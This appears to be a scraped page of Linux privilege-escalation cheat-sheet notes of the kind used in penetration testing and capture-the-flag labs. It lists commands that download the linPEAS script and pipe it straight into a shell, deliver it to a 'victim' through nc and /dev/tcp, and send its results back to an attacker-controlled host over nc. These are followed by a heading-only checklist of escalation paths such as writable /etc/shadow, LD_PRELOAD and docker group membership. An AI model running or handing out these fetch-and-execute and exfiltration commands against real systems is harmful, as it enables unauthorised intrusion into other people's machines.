PrivilageEsc Linux π
Remote Network
## ------------------| Remote download and execrute from Github
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
wget -q -O - https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh Local Network
## ------------------| Local Network
curl 10.10.10.10/linpeas.sh | sh
## ------------------| Without CURL
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim
## ------------------| Excute from memory and send output back to the host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
wget -q -O - 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
nc -lvnp 9002 | tee linpeas.out #HostOutput Format
## ------------------| Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colorsAV Bypass
Remote Network
Local Network
-Linux process snooping [unprivileged]
06. Common exploits
06.0 Abusing Shell Features
06.1 Shellshock
06.2 LXD
06.5 If you have or can?
If you have
LD_PRELOADinenv_keepvariable?
If you have
LD_LIBRARY_PATHinenv_keepvariable?
If you have
SETENVinsudo -l?
Do we have
no_root_squashin/etc/exports
If you have write permission to
/etc/sudoersfile?
If you have write permission to
/etc/shadowfile?
If you have write permission to
/etc/passwd?
Can run
apache2as root user?
If you are in **
video** group
If you are in
dockergroup
If you have
apt updateon/etc/crontab
If
sudo -lonly forapt-get updateorapt-get upgrade?
If you see
jdwprun as privilege user ??
If you are in
diskgroup ?
Can you run gdb (debug)?
If you can read
.Xauthorityfile?
If you can run
dstattool as sudo
If we can run any
doas
06.6 SUDO Vulnerability
06.7 Ansible
06.8 Other
07. Kernel Privesc
Last updated